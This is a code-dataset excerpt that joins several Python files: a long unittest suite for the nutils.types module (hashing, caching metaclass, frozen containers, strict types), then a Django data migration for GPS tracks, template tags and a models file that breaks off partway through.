self.assertEqual(f(1, b=2, c=3), ('1', dict(b='2', c='3')))
def test_posonly_varkw(self):
def f(a, b, **c):
return a, b, c
f.__signature__ = inspect.Signature([inspect.Parameter('a', inspect.Parameter.POSITIONAL_ONLY, annotation=str),
inspect.Parameter('b', inspect.Parameter.POSITIONAL_OR_KEYWORD, annotation=str, default=None),
inspect.Parameter('c', inspect.Parameter.VAR_KEYWORD)])
f = nutils.types.apply_annotations(f)
self.assertEqual(f(1, c=2, d=3), ('1', None, dict(c=2, d=3)))
self.assertEqual(f(1, None, c=2, d=3), ('1', None, dict(c=2, d=3)))
self.assertEqual(f(1, b=None, c=2, d=3), ('1', None, dict(c=2, d=3)))
self.assertEqual(f(1, b=4, c=2, d=3), ('1', '4', dict(c=2, d=3)))
def test_default_none(self):
@nutils.types.apply_annotations
def f(a:str=None):
return a
self.assertEqual(f(), None)
self.assertEqual(f(None), None)
self.assertEqual(f(1), '1')
class nutils_hash(TestCase):
def test_ellipsis(self):
self.assertEqual(nutils.types.nutils_hash(...).hex(), '0c8bce06e451e4d5c49f60da0abf2ccbadf80600')
def test_None(self):
self.assertEqual(nutils.types.nutils_hash(None).hex(), 'bdfcbd663476b2db5b2b2e59a6d93882a908dc76')
def test_bool(self):
self.assertEqual(nutils.types.nutils_hash(False).hex(), '04a5e8f73dcea55dcd7482a476cf2e7b53d6dc50')
self.assertEqual(nutils.types.nutils_hash(True).hex(), '3fe990437e1624c831729f2866979254437bb7e9')
def test_int(self):
self.assertEqual(nutils.types.nutils_hash(1).hex(), '00ec7dea895ebd921e56bbc554688d8b3a1e4dfc')
self.assertEqual(nutils.types.nutils_hash(2).hex(), '8ae88fa39407cf75e46f9e0aba8c971de2256b14')
def test_float(self):
self.assertEqual(nutils.types.nutils_hash(1.).hex(), 'def4bae4f2a3e29f6ddac537d3fa7c72195e5d8b')
self.assertEqual(nutils.types.nutils_hash(2.5).hex(), '5216c2bf3c16d8b8ff4d9b79f482e5cea0a4cb95')
def test_complex(self):
self.assertEqual(nutils.types.nutils_hash(1+0j).hex(), 'cf7a0d933b7bb8d3ca252683b137534a1ecae073')
self.assertEqual(nutils.types.nutils_hash(2+1j).hex(), 'ee088890528f941a80aa842dad36591b05253e55')
def test_inequality_numbers(self):
self.assertNotEqual(nutils.types.nutils_hash(1).hex(), nutils.types.nutils_hash(1.).hex())
self.assertNotEqual(nutils.types.nutils_hash(1).hex(), nutils.types.nutils_hash(1+0j).hex())
self.assertNotEqual(nutils.types.nutils_hash(1).hex(), nutils.types.nutils_hash(True).hex())
def test_str(self):
self.assertEqual(nutils.types.nutils_hash('spam').hex(), '3ca1023ab75a68dc7b0f83b43ec624704a7aef61')
self.assertEqual(nutils.types.nutils_hash('eggs').hex(), '124b0a7b3984e08125c380f7454896c1cad22e2c')
def test_bytes(self):
self.assertEqual(nutils.types.nutils_hash(b'spam').hex(), '5e717ec15aace7c25610c1dea340f2173f2df014')
self.assertEqual(nutils.types.nutils_hash(b'eggs').hex(), '98f2061978497751cac94f982fd96d9b015b74c3')
def test_tuple(self):
self.assertEqual(nutils.types.nutils_hash(()).hex(), '15d44755bf0731b2a3e9a5c5c8e0807b61881a1f')
self.assertEqual(nutils.types.nutils_hash((1,)).hex(), '328b16ebbc1815cf579ae038a35c4d68ebb022af')
self.assertNotEqual(nutils.types.nutils_hash((1,'spam')).hex(), nutils.types.nutils_hash(('spam',1)).hex())
def test_frozenset(self):
self.assertEqual(nutils.types.nutils_hash(frozenset([1,2])).hex(), '3862dc7e5321bc8a576c385ed2c12c71b96a375a')
self.assertEqual(nutils.types.nutils_hash(frozenset(['spam','eggs'])).hex(), '2c75fd3db57f5e505e1425ae9ff6dcbbc77fd123')
def test_type_bool(self):
self.assertEqual(nutils.types.nutils_hash(bool).hex(), 'feb912889d52d45fcd1e778c427b093a19a1ea78')
def test_type_int(self):
self.assertEqual(nutils.types.nutils_hash(int).hex(), 'aa8cb9975f7161b1f7ceb88b4b8585b49946b31e')
def test_type_float(self):
self.assertEqual(nutils.types.nutils_hash(float).hex(), '6d5079a53075f4b6f7710377838d8183730f1388')
def test_type_complex(self):
self.assertEqual(nutils.types.nutils_hash(complex).hex(), '6b00f6b9c6522742fd3f8054af6f10a24a671fff')
def test_type_str(self):
self.assertEqual(nutils.types.nutils_hash(str).hex(), '2349e11586163208d2581fe736630f4e4b680a7b')
def test_type_bytes(self):
self.assertEqual(nutils.types.nutils_hash(bytes).hex(), 'b0826ca666a48739e6f8b968d191adcefaa39670')
def test_type_tuple(self):
self.assertEqual(nutils.types.nutils_hash(tuple).hex(), '07cb4a24ca8ac53c820f20721432b4726e2ad1af')
def test_type_frozenset(self):
self.assertEqual(nutils.types.nutils_hash(frozenset).hex(), '48dc7cd0fbd54924498deb7c68dd363b4049f5e2')
def test_custom(self):
class custom:
@property
def __nutils_hash__(self):
return b'01234567890123456789'
self.assertEqual(nutils.types.nutils_hash(custom()).hex(), b'01234567890123456789'.hex())
def test_unhashable(self):
with self.assertRaises(TypeError):
nutils.types.nutils_hash([])
class CacheMeta(TestCase):
def test_property(self):
for withslots in False, True:
with self.subTest(withslots=withslots):
class T(metaclass=nutils.types.CacheMeta):
if withslots:
__slots__ = ()
__cache__ = 'x',
@property
def x(self):
nonlocal ncalls
ncalls += 1
return 1
ncalls = 0
t = T()
self.assertEqual(ncalls, 0)
self.assertEqual(t.x, 1)
self.assertEqual(ncalls, 1)
self.assertEqual(t.x, 1)
self.assertEqual(ncalls, 1)
def test_set_property(self):
class T(metaclass=nutils.types.CacheMeta):
__cache__ = 'x',
@property
def x(self):
return 1
t = T()
with self.assertRaises(AttributeError):
t.x = 1
def test_del_property(self):
class T(metaclass=nutils.types.CacheMeta):
__cache__ = 'x',
@property
def x(self):
return 1
t = T()
with self.assertRaises(AttributeError):
del t.x
def test_method_without_args(self):
for withslots in False, True:
with self.subTest(withslots=withslots):
class T(metaclass=nutils.types.CacheMeta):
if withslots:
__slots__ = ()
__cache__ = 'x',
def x(self):
nonlocal ncalls
ncalls += 1
return 1
ncalls = 0
t = T()
self.assertEqual(ncalls, 0)
self.assertEqual(t.x(), 1)
self.assertEqual(ncalls, 1)
self.assertEqual(t.x(), 1)
self.assertEqual(ncalls, 1)
def test_method_with_args(self):
for withslots in False, True:
with self.subTest(withslots=withslots):
class T(metaclass=nutils.types.CacheMeta):
if withslots:
__slots__ = ()
__cache__ = 'x',
def x(self, a, b):
nonlocal ncalls
ncalls += 1
return a + b
ncalls = 0
t = T()
self.assertEqual(ncalls, 0)
self.assertEqual(t.x(1, 2), 3)
self.assertEqual(ncalls, 1)
self.assertEqual(t.x(a=1, b=2), 3)
self.assertEqual(ncalls, 1)
self.assertEqual(t.x(2, 2), 4)
self.assertEqual(ncalls, 2)
self.assertEqual(t.x(a=2, b=2), 4)
self.assertEqual(ncalls, 2)
self.assertEqual(t.x(1, 2), 3)
self.assertEqual(ncalls, 3)
def test_method_with_args_and_preprocessors(self):
for withslots in False, True:
with self.subTest(withslots=withslots):
class T(metaclass=nutils.types.CacheMeta):
if withslots:
__slots__ = ()
__cache__ = 'x',
@nutils.types.apply_annotations
def x(self, a:int, b:int):
nonlocal ncalls
ncalls += 1
return a + b
ncalls = 0
t = T()
self.assertEqual(ncalls, 0)
self.assertEqual(t.x(1, 2), 3)
self.assertEqual(ncalls, 1)
self.assertEqual(t.x(a='1', b='2'), 3)
self.assertEqual(ncalls, 1)
self.assertEqual(t.x('2', '2'), 4)
self.assertEqual(ncalls, 2)
self.assertEqual(t.x(a=2, b=2), 4)
self.assertEqual(ncalls, 2)
self.assertEqual(t.x('1', 2), 3)
self.assertEqual(ncalls, 3)
def test_method_with_kwargs(self):
for withslots in False, True:
with self.subTest(withslots=withslots):
class T(metaclass=nutils.types.CacheMeta):
if withslots:
__slots__ = ()
__cache__ = 'x',
def x(self, a, **kwargs):
nonlocal ncalls
ncalls += 1
return a + sum(kwargs.values())
ncalls = 0
t = T()
self.assertEqual(ncalls, 0)
self.assertEqual(t.x(1, b=2), 3)
self.assertEqual(ncalls, 1)
self.assertEqual(t.x(a=1, b=2), 3)
self.assertEqual(ncalls, 1)
self.assertEqual(t.x(1, b=2, c=3), 6)
self.assertEqual(ncalls, 2)
self.assertEqual(t.x(a=1, b=2, c=3), 6)
self.assertEqual(ncalls, 2)
def test_subclass_redefined_property(self):
class T(metaclass=nutils.types.CacheMeta):
__cache__ = 'x',
@property
def x(self):
return 1
class U(T):
__cache__ = 'x',
@property
def x(self):
return super().x + 1
@property
def y(self):
return super().x
u1 = U()
self.assertEqual(u1.x, 2)
self.assertEqual(u1.y, 1)
u2 = U()
self.assertEqual(u2.y, 1)
self.assertEqual(u2.x, 2)
def test_missing_attribute(self):
with self.assertRaisesRegex(TypeError, 'Attribute listed in __cache__ is undefined: x'):
class T(metaclass=nutils.types.CacheMeta):
__cache__ = 'x',
def test_invalid_attribute(self):
with self.assertRaisesRegex(TypeError, "Don't know how to cache attribute x: None"):
class T(metaclass=nutils.types.CacheMeta):
__cache__ = 'x',
x = None
def test_name_mangling(self):
for withslots in False, True:
with self.subTest(withslots=withslots):
class T(metaclass=nutils.types.CacheMeta):
if withslots:
__slots__ = ()
__cache__ = '__x',
@property
def __x(self):
nonlocal ncalls
ncalls += 1
return 1
@property
def y(self):
return self.__x
ncalls = 0
t = T()
self.assertEqual(ncalls, 0)
self.assertEqual(t.y, 1)
self.assertEqual(ncalls, 1)
self.assertEqual(t.y, 1)
self.assertEqual(ncalls, 1)
class strictint(TestCase):
def test_int(self):
value = nutils.types.strictint(1)
self.assertEqual(value, 1)
self.assertEqual(type(value), int)
def test_numpy_int(self):
value = nutils.types.strictint(numpy.int64(1))
self.assertEqual(value, 1)
self.assertEqual(type(value), int)
def test_float(self):
with self.assertRaises(ValueError):
nutils.types.strictint(1.)
def test_numpy_float(self):
with self.assertRaises(ValueError):
nutils.types.strictint(numpy.float64(1.))
def test_complex(self):
with self.assertRaises(ValueError):
nutils.types.strictint(1+0j)
def test_str(self):
with self.assertRaises(ValueError):
nutils.types.strictint('1')
class strictfloat(TestCase):
def test_int(self):
value = nutils.types.strictfloat(1)
self.assertEqual(value, 1.)
self.assertEqual(type(value), float)
def test_numpy_int(self):
value = nutils.types.strictfloat(numpy.int64(1))
self.assertEqual(value, 1.)
self.assertEqual(type(value), float)
def test_float(self):
value = nutils.types.strictfloat(1.)
self.assertEqual(value, 1.)
self.assertEqual(type(value), float)
def test_numpy_float(self):
value = nutils.types.strictfloat(numpy.float64(1.))
self.assertEqual(value, 1.)
self.assertEqual(type(value), float)
def test_complex(self):
with self.assertRaises(ValueError):
nutils.types.strictint(1+0j)
def test_str(self):
with self.assertRaises(ValueError):
nutils.types.strictfloat('1.')
class strictstr(TestCase):
def test_str(self):
value = nutils.types.strictstr('spam')
self.assertEqual(value, 'spam')
self.assertEqual(type(value), str)
def test_int(self):
with self.assertRaises(ValueError):
nutils.types.strictstr(1)
class strict(TestCase):
def test_valid(self):
self.assertEqual(nutils.types.strict[int](1), 1)
def test_invalid(self):
with self.assertRaises(ValueError):
nutils.types.strict[int]('1')
def test_call(self):
with self.assertRaises(TypeError):
nutils.types.strict()
class tupletype(TestCase):
def test_valid1(self):
value = nutils.types.tuple[nutils.types.strictint]([])
self.assertEqual(value, ())
self.assertEqual(type(value), tuple)
def test_valid2(self):
value = nutils.types.tuple[nutils.types.strictint]([1,2,3])
self.assertEqual(value, (1,2,3))
self.assertEqual(type(value), tuple)
def test_invalid(self):
with self.assertRaises(ValueError):
nutils.types.tuple[nutils.types.strictint]([1, 'spam','eggs'])
def test_without_item_constructor(self):
src = 1,2,3
self.assertEqual(nutils.types.tuple(src), tuple(src))
def test_name(self):
self.assertEqual(nutils.types.tuple[nutils.types.strictint].__name__, 'tuple[nutils.types.strictint]')
class frozendict(TestCase):
def test_constructor(self):
src = {'spam': 1, 'eggs': 2.3}
for name, value in [('mapping', src), ('mapping_view', src.items()), ('iterable', (item for item in src.items())), ('frozendict', nutils.types.frozendict(src))]:
with self.subTest(name):
frozen = nutils.types.frozendict(value)
self.assertIsInstance(frozen, nutils.types.frozendict)
self.assertEqual(dict(frozen), src)
def test_constructor_invalid(self):
with self.assertRaises(ValueError):
nutils.types.frozendict(['spam', 'eggs', 1])
def test_clsgetitem(self):
T = nutils.types.frozendict[str, float]
src = {1: 2, 'spam': '2.3'}
for name, value in [('mapping', src), ('mapping_view', src.items()), ('iterable', (item for item in src.items()))]:
with self.subTest(name):
frozen = T(value)
self.assertIsInstance(frozen, nutils.types.frozendict)
self.assertEqual(dict(frozen), {'1': 2., 'spam': 2.3})
def test_clsgetitem_invalid_types(self):
with self.assertRaises(RuntimeError):
nutils.types.frozendict[str, float, bool]
def test_clsgetitem_invalid_value(self):
T = nutils.types.frozendict[str, float]
with self.assertRaises(ValueError):
T(1)
def test_setitem(self):
frozen = nutils.types.frozendict({'spam': 1, 'eggs': 2.3})
with self.assertRaises(TypeError):
frozen['eggs'] = 3
def test_delitem(self):
frozen = nutils.types.frozendict({'spam': 1, 'eggs': 2.3})
with self.assertRaises(TypeError):
del frozen['eggs']
def test_getitem_existing(self):
frozen = nutils.types.frozendict({'spam': 1, 'eggs': 2.3})
self.assertEqual(frozen['spam'], 1)
def test_getitem_nonexisting(self):
frozen = nutils.types.frozendict({'spam': 1, 'eggs': 2.3})
with self.assertRaises(KeyError):
frozen['foo']
def test_contains(self):
frozen = nutils.types.frozendict({'spam': 1, 'eggs': 2.3})
self.assertIn('spam', frozen)
self.assertNotIn('foo', frozen)
def test_iter(self):
src = {'spam': 1, 'eggs': 2.3}
frozen = nutils.types.frozendict(src)
self.assertEqual(frozenset(frozen), frozenset(src))
def test_len(self):
src = {'spam': 1, 'eggs': 2.3}
frozen = nutils.types.frozendict(src)
self.assertEqual(len(frozen), len(src))
def test_hash(self):
src = {'spam': 1, 'eggs': 2.3}
self.assertEqual(hash(nutils.types.frozendict(src)), hash(nutils.types.frozendict(src)))
def test_copy(self):
src = {'spam': 1, 'eggs': 2.3}
copy = nutils.types.frozendict(src).copy()
self.assertIsInstance(copy, dict)
self.assertEqual(copy, src)
def test_pickle(self):
src = {'spam': 1, 'eggs': 2.3}
frozen = pickle.loads(pickle.dumps(nutils.types.frozendict(src)))
self.assertIsInstance(frozen, nutils.types.frozendict)
self.assertEqual(dict(frozen), src)
def test_eq_same_id(self):
src = {'spam': 1, 'eggs': 2.3}
a = nutils.types.frozendict(src)
self.assertEqual(a, a)
def test_eq_other_id(self):
src = {'spam': 1, 'eggs': 2.3}
a = nutils.types.frozendict(src)
b = nutils.types.frozendict(src)
self.assertEqual(a, b)
def test_eq_deduplicated(self):
src = {'spam': 1, 'eggs': 2.3}
a = nutils.types.frozendict(src)
b = nutils.types.frozendict(src)
a == b # this replaces `a.__base` with `b.__base`
self.assertEqual(a, b)
def test_ineq_frozendict(self):
src = {'spam': 1, 'eggs': 2.3}
self.assertNotEqual(nutils.types.frozendict(src), nutils.types.frozendict({'spam': 1}))
def test_ineq_dict(self):
src = {'spam': 1, 'eggs': 2.3}
self.assertNotEqual(nutils.types.frozendict(src), src)
def test_nutils_hash(self):
frozen = nutils.types.frozendict({'spam': 1, 'eggs': 2.3})
self.assertEqual(nutils.types.nutils_hash(frozen).hex(), '8cf14f109e54707af9c2e66d7d3cdb755cce8243')
class frozenmultiset(TestCase):
def test_constructor(self):
src = 'spam', 'bacon', 'sausage', 'spam'
for name, value in [('tuple', src), ('frozenmultiset', nutils.types.frozenmultiset(src))]:
with self.subTest(name=name):
frozen = nutils.types.frozenmultiset(value)
for item in 'spam', 'bacon', 'sausage':
self.assertEqual({k: tuple(frozen).count(k) for k in set(src)}, {'spam':2, 'bacon':1, 'sausage':1})
def test_clsgetitem(self):
src = False, 1, numpy.int64(2)
frozen = nutils.types.frozenmultiset[nutils.types.strictint](src)
self.assertEqual(set(frozen), {0, 1, 2})
def test_preserve_order(self):
for src in [('spam', 'bacon', 'sausage', 'spam'), ('spam', 'egg', 'spam', 'spam', 'bacon', 'spam')]:
with self.subTest(src=src):
self.assertEqual(tuple(nutils.types.frozenmultiset(src)), src)
def test_and(self):
for l, r, lar in [[['spam', 'eggs'], ['spam', 'spam', 'eggs'], ['spam', 'eggs']],
[['spam'], ['eggs'], []],
[['spam','spam']]*3]:
with self.subTest(l=l, r=r, lar=lar):
self.assertEqual(nutils.types.frozenmultiset(l)&nutils.types.frozenmultiset(r), nutils.types.frozenmultiset(lar))
with self.subTest(l=r, r=l, lar=lar):
self.assertEqual(nutils.types.frozenmultiset(r)&nutils.types.frozenmultiset(l), nutils.types.frozenmultiset(lar))
def test_sub(self):
for l, r, lmr, rml in [[['spam', 'eggs'], ['spam', 'spam', 'eggs'], [], ['spam']],
[['spam'], ['eggs'], ['spam'], ['eggs']],
[['spam'], ['spam'], [], []]]:
with self.subTest(l=l, r=r, lmr=lmr):
self.assertEqual(nutils.types.frozenmultiset(l)-nutils.types.frozenmultiset(r), nutils.types.frozenmultiset(lmr))
with self.subTest(l=r, r=l, lmr=rml):
self.assertEqual(nutils.types.frozenmultiset(r)-nutils.types.frozenmultiset(l), nutils.types.frozenmultiset(rml))
def test_pickle(self):
src = 'spam', 'bacon', 'sausage', 'spam'
frozen = pickle.loads(pickle.dumps(nutils.types.frozenmultiset(src)))
self.assertIsInstance(frozen, nutils.types.frozenmultiset)
self.assertEqual(frozen, nutils.types.frozenmultiset(src))
def test_hash(self):
src = 'spam', 'bacon', 'sausage', 'spam'
ref = nutils.types.frozenmultiset(src)
for perm in itertools.permutations(src):
with self.subTest(perm=perm):
self.assertEqual(hash(nutils.types.frozenmultiset(src)), hash(ref))
def test_nutils_hash(self):
for perm in itertools.permutations(('spam', 'bacon', 'sausage', 'spam')):
with self.subTest(perm=perm):
frozen = nutils.types.frozenmultiset(perm)
self.assertEqual(nutils.types.nutils_hash(frozen).hex(), 'f3fd9c6d4741af2e67973457ee6308deddcb714c')
def test_eq(self):
src = 'spam', 'bacon', 'sausage', 'spam'
ref = nutils.types.frozenmultiset(src)
for perm in itertools.permutations(src):
with self.subTest(perm=perm):
self.assertEqual(nutils.types.frozenmultiset(src), ref)
def test_contains(self):
src = 'spam', 'bacon', 'sausage', 'spam'
frozen = nutils.types.frozenmultiset(src)
for item in 'spam', 'bacon', 'eggs':
with self.subTest(item=item):
if item in src:
self.assertIn(item, frozen)
else:
self.assertNotIn(item, frozen)
def test_len(self):
src = 'spam', 'bacon', 'sausage', 'spam'
frozen = nutils.types.frozenmultiset(src)
self.assertEqual(len(frozen), len(src))
def test_nonzero(self):
self.assertTrue(nutils.types.frozenmultiset(['spam', 'eggs']))
self.assertFalse(nutils.types.frozenmultiset([]))
def test_add(self):
l = nutils.types.frozenmultiset(['spam', 'bacon'])
r = nutils.types.frozenmultiset(['sausage', 'spam'])
lpr = nutils.types.frozenmultiset(['spam', 'bacon', 'sausage', 'spam'])
self.assertEqual(l+r, lpr)
def test_isdisjoint(self):
for l, r, disjoint in [[['spam', 'eggs'], ['spam', 'spam', 'eggs'], False],
[['spam'], ['eggs'], True],
[['spam'], ['spam'], False]]:
with self.subTest(l=l, r=r, disjoint=disjoint):
self.assertEqual(nutils.types.frozenmultiset(l).isdisjoint(nutils.types.frozenmultiset(r)), disjoint)
class frozenarray(TestCase):
def _test_constructor(self, src, frozen_dtype):
src = list(src)
for copy in True, False:
for src_type in list, numpy.array, nutils.types.frozenarray:
with self.subTest(copy=copy, src_type=src_type):
frozen = nutils.types.frozenarray(src_type(src), copy=copy, dtype=frozen_dtype)
self.assertIsInstance(frozen, nutils.types.frozenarray)
self.assertEqual(frozen.tolist(), src)
def _test_constructor_raises(self, src, frozen_dtype, exc_type, exc_regex):
src = list(src)
for copy in True, False:
for src_type in list, numpy.array, nutils.types.frozenarray:
with self.subTest(copy=copy, src_type=src_type), self.assertRaisesRegex(exc_type, exc_regex):
nutils.types.frozenarray(src_type(src), copy=copy, dtype=frozen_dtype)
def test_constructor_bool(self):
self._test_constructor((False, True), bool)
def test_constructor_int(self):
self._test_constructor((0,1), int)
def test_constructor_int_upcast(self):
self._test_constructor((False,True), int)
def test_constructor_int_downcast(self):
self._test_constructor((0.,1.), int)
def test_constructor_float(self):
self._test_constructor((0.,1.), float)
def test_constructor_float_upcast(self):
self._test_constructor((0,1), float)
def test_constructor_float_downcast(self):
src = [0.+0j,1.+0j]
for copy in True, False:
with self.subTest(copy=copy, src_type=list), self.assertRaises(TypeError):
nutils.types.frozenarray(src, copy=copy, dtype=float)
for src_type in numpy.array, nutils.types.frozenarray:
with self.subTest(copy=copy, src_type=src_type), self.assertWarns(numpy.ComplexWarning):
nutils.types.frozenarray(src_type(src), copy=copy, dtype=float)
def test_constructor_complex(self):
self._test_constructor((0+0j,1+1j), complex)
def test_constructor_strictint(self):
self._test_constructor((0,1), nutils.types.strictint)
def test_constructor_strictint_upcast(self):
self._test_constructor((False,True), nutils.types.strictint)
def test_constructor_strictint_downcast(self):
self._test_constructor_raises((0.,1.), nutils.types.strictint, ValueError, '^downcasting .* is forbidden$')
def test_constructor_strictfloat(self):
self._test_constructor((0.,1.), nutils.types.strictfloat)
def test_constructor_strictfloat_upcast(self):
self._test_constructor((0,1), nutils.types.strictfloat)
def test_constructor_strictfloat_downcast(self):
self._test_constructor_raises((0.+0j,1.+0j), nutils.types.strictfloat, ValueError, '^downcasting .* is forbidden$')
def test_constructor_invalid_dtype(self):
self._test_constructor_raises((0,1), list, ValueError, '^unsupported dtype:')
def test_clsgetitem(self):
src = [0.,1.]
frozen = nutils.types.frozenarray[nutils.types.strictfloat](src)
self.assertIsInstance(frozen, nutils.types.frozenarray)
self.assertEqual(frozen.tolist(), src)
def test_clsgetitem_invalid(self):
src = [0.,1.]
with self.assertRaises(ValueError):
nutils.types.frozenarray[nutils.types.strictint](src)
def test_nutils_hash(self):
a = nutils.types.frozenarray(numpy.array([[1,2],[3,4]], numpy.int64))
b = nutils.types.frozenarray(numpy.array([[1,3],[2,4]], numpy.int64))
self.assertNotEqual(nutils.types.nutils_hash(a).hex(), nutils.types.nutils_hash(b).hex())
self.assertEqual(nutils.types.nutils_hash(a).hex(), nutils.types.nutils_hash(b.T).hex())
self.assertEqual(nutils.types.nutils_hash(a).hex(), '42cc3a5e1216c1f0a9921a61a3a2c67025c98d69')
self.assertEqual(nutils.types.nutils_hash(b).hex(), '8f0c9f9a118c42c258f1e69e374aadda99b4be97')
def test_pickle(self):
src = [[1,2],[3,4]]
value = pickle.loads(pickle.dumps(nutils.types.frozenarray(src)))
self.assertIsInstance(value, nutils.types.frozenarray)
self.assertEqual(value, nutils.types.frozenarray(src))
def test_eq_same_instance(self):
a = nutils.types.frozenarray([[1,2],[3,4]], int)
self.assertEqual(a, a)
def test_eq_not_frozenarray(self):
a = nutils.types.frozenarray([[1,2],[3,4]], int)
self.assertNotEqual(a, [[1,2],[3,4]])
def test_eq_same_base(self):
base = numpy.array([[1,2],[3,4]], int)
a = nutils.types.frozenarray(base, copy=False)
b = nutils.types.frozenarray(base, copy=False)
self.assertEqual(a, b)
def test_eq_different_array(self):
a = nutils.types.frozenarray([[1,2],[3,4]], int)
b = nutils.types.frozenarray([[1,3],[2,4]], int)
self.assertNotEqual(a, b)
def test_eq_different_dtype(self):
a = nutils.types.frozenarray([[1,2],[3,4]], int)
b = nutils.types.frozenarray([[1,2],[3,4]], float)
self.assertNotEqual(a, b)
def test_eq_different_base(self):
a = nutils.types.frozenarray([[1,2],[3,4]], int)
b = nutils.types.frozenarray([[1,2],[3,4]], int)
self.assertEqual(a, b)
def test_ineq_equal(self):
l = nutils.types.frozenarray([1,2], int)
r = nutils.types.frozenarray([1,2], int)
self.assertFalse(l < r)
self.assertTrue(l <= r)
self.assertFalse(l > r)
self.assertTrue(l >= r)
def test_ineq_smaller(self):
l = nutils.types.frozenarray([1,2], int)
r = nutils.types.frozenarray([2,1], int)
self.assertTrue(l < r)
self.assertTrue(l <= r)
self.assertFalse(l > r)
self.assertFalse(l >= r)
def test_ineq_larger(self):
l = nutils.types.frozenarray([2,1], int)
r = nutils.types.frozenarray([1,2], int)
self.assertFalse(l < r)
self.assertFalse(l <= r)
self.assertTrue(l > r)
self.assertTrue(l >= r)
def test_ineq_incomparable(self):
array = nutils.types.frozenarray([1,2], int)
for op in operator.lt, operator.le, operator.gt, operator.ge:
with self.subTest(op=op), self.assertRaises(TypeError):
op(array, 1)
def test_full(self):
self.assertEqual(nutils.types.frozenarray.full([2,3], 1.5), nutils.types.frozenarray([[1.5]*3]*2, float))
def test_as_numpy_array(self):
a = numpy.array(nutils.types.frozenarray([1,2]))
self.assertIsInstance(a, numpy.ndarray)
class c_array(TestCase):
def test_idempotence(self):
a = numpy.array([1,2,3], dtype=numpy.int64)
P = nutils.types.c_array[numpy.int64]
a_ct = P(a)
self.assertEqual(P(a_ct), a_ct)
def test_list(self):
a = [1,2,3]
a_ct = nutils.types.c_array[numpy.int64](a)
self.assertEqual(a_ct.data_as(ctypes.POINTER(ctypes.c_int64)).contents.value, 1)
def test_array(self):
a = numpy.array([1,2,3], dtype=numpy.int64)
a_ct = nutils.types.c_array[numpy.int64](a)
self.assertEqual(a_ct.data_as(ctypes.POINTER(ctypes.c_int64)).contents.value, 1)
def test_array_invalid_dtype(self):
a = numpy.array([1,2,3], dtype=numpy.int32)
with self.assertRaisesRegex(ValueError, '^Expected dtype .* but array has dtype .*\\.$'):
a_ct = nutils.types.c_array[numpy.int64](a)
def test_array_noncontinguous(self):
a = numpy.array([[1,2],[3,4]], dtype=numpy.int32).T
with self.assertRaisesRegex(ValueError, '^Array is not contiguous\\.$'):
a_ct = nutils.types.c_array[numpy.int64](a)
def test_wo_getitem(self):
with self.assertRaises(TypeError):
nutils.types.c_array()
class T_Immutable(nutils.types.Immutable):
def __init__(self, x, y):
pass
class T_Singleton(nutils.types.Singleton):
def __init__(self, x, y):
pass
@parametrize
class ImmutableFamily(TestCase):
def test_pickle(self):
T = {nutils.types.Immutable: T_Immutable, nutils.types.Singleton: T_Singleton}[self.cls]
a = T(1, 2)
b = pickle.loads(pickle.dumps(a))
self.assertEqual(a, b)
def test_eq(self):
class T(self.cls):
def __init__(self, x, y):
pass
class U(self.cls):
def __init__(self, x, y):
pass
self.assertEqual(T(1, 2), T(1, 2))
self.assertNotEqual(T(1, 2), T(2, 1))
self.assertNotEqual(T(1, 2), U(1, 2))
def test_canonical_args(self):
class T(self.cls):
def __init__(self, x, y, z=3):
pass
self.assertEqual(T(x=1, y=2), T(1, 2, 3))
def test_preprocessors(self):
class T(self.cls):
@nutils.types.apply_annotations
def __init__(self, x: int):
pass
self.assertEqual(T(1), T('1'))
self.assertEqual(T(1), T(x='1'))
def test_nutils_hash(self):
class T(self.cls):
def __init__(self, x, y):
pass
class T1(self.cls, version=1):
def __init__(self, x, y):
pass
class U(self.cls):
def __init__(self, x, y):
pass
self.assertEqual(nutils.types.nutils_hash(T(1, 2)).hex(), nutils.types.nutils_hash(T(1, 2)).hex())
self.assertNotEqual(nutils.types.nutils_hash(T(1, 2)).hex(), nutils.types.nutils_hash(T(2, 1)).hex())
self.assertNotEqual(nutils.types.nutils_hash(T(1, 2)).hex(), nutils.types.nutils_hash(U(1, 2)).hex())
# Since the hash does not include base classes, the hashes of Immutable and Singleton are the same.
self.assertEqual(nutils.types.nutils_hash(T(1, 2)).hex(), '8c3ba8f0d9eb054ab192f4e4e2ba7442564bdf85')
self.assertEqual(nutils.types.nutils_hash(T1(1, 2)).hex(), 'bab4ee65b5189f544a4242f0e386af76cfa6e31d')
@parametrize.enable_if(lambda cls: cls is nutils.types.Singleton)
def test_deduplication(self):
class T(self.cls):
def __init__(self, x, y):
pass
class U(self.cls):
def __init__(self, x, y):
pass
a = T(1, 2)
b = T(1, 2)
c = T(2, 1)
d = U(1, 2)
self.assertIs(a, b)
self.assertEqual(a, b)
self.assertIsNot(a, c)
self.assertNotEqual(a, c)
self.assertIsNot(a, d)
self.assertNotEqual(a, d)
ImmutableFamily(cls=nutils.types.Immutable)
ImmutableFamily(cls=nutils.types.Singleton)
# vim:shiftwidth=2:softtabstop=2:expandtab:foldmethod=indent:foldnestmax=2
``` |
{
"source": "jochenklar/bike",
"score": 2
} |
#### File: tracks/migrations/0004_data_migration.py
```python
from __future__ import unicode_literals
import json
from django.db import migrations
from ..utils import parse_file
def run_data_migration(apps, schema_editor):
Track = apps.get_model('tracks', 'Track')
NewTrack = apps.get_model('tracks', 'NewTrack')
for track in Track.objects.order_by('timestamp'):
new_track = NewTrack(file=track.track, name=track.name or track.track.name)
track_data = parse_file(new_track.file)
if track_data:
new_track.start_time = track_data['start_time']
new_track.end_time = track_data['end_time']
new_track.distance = track_data['distance']
new_track.geojson = json.dumps(track_data['geojson'])
new_track.save()
class Migration(migrations.Migration):
dependencies = [
('tracks', '0003_newtrack')
]
operations = [
migrations.RunPython(run_data_migration),
]
``` |
{
"source": "jochenklar/caipirinha",
"score": 2
} |
#### File: core/templatetags/core_tags.py
```python
from django import template
from django.conf import settings
from django.core.urlresolvers import reverse
register = template.Library()
@register.simple_tag(takes_context=True)
def login_link(context):
if context.request.user.is_authenticated():
url = settings.LOGOUT_URL
text = 'Logout'
else:
url = settings.LOGIN_URL
text = 'Login'
return "<a href=\"%s\">%s</a>" % (url,text)
@register.simple_tag()
def internal_link(url, text):
return "<a href=\"%s\">%s</a>" % (url,text)
```
#### File: caipirinha/users/models.py
```python
from django.db import models
from django.contrib.auth.models import User
from jsonfield import JSONField
class DetailKey(models.Model):
TYPE_CHOICES = (
('text', 'Input field'),
('textarea', 'Textarea field'),
('checkbox', 'Checkbox'),
('radio', 'Radio button'),
('select', 'Select field'),
('multiselect', 'Multiselect field'),
)
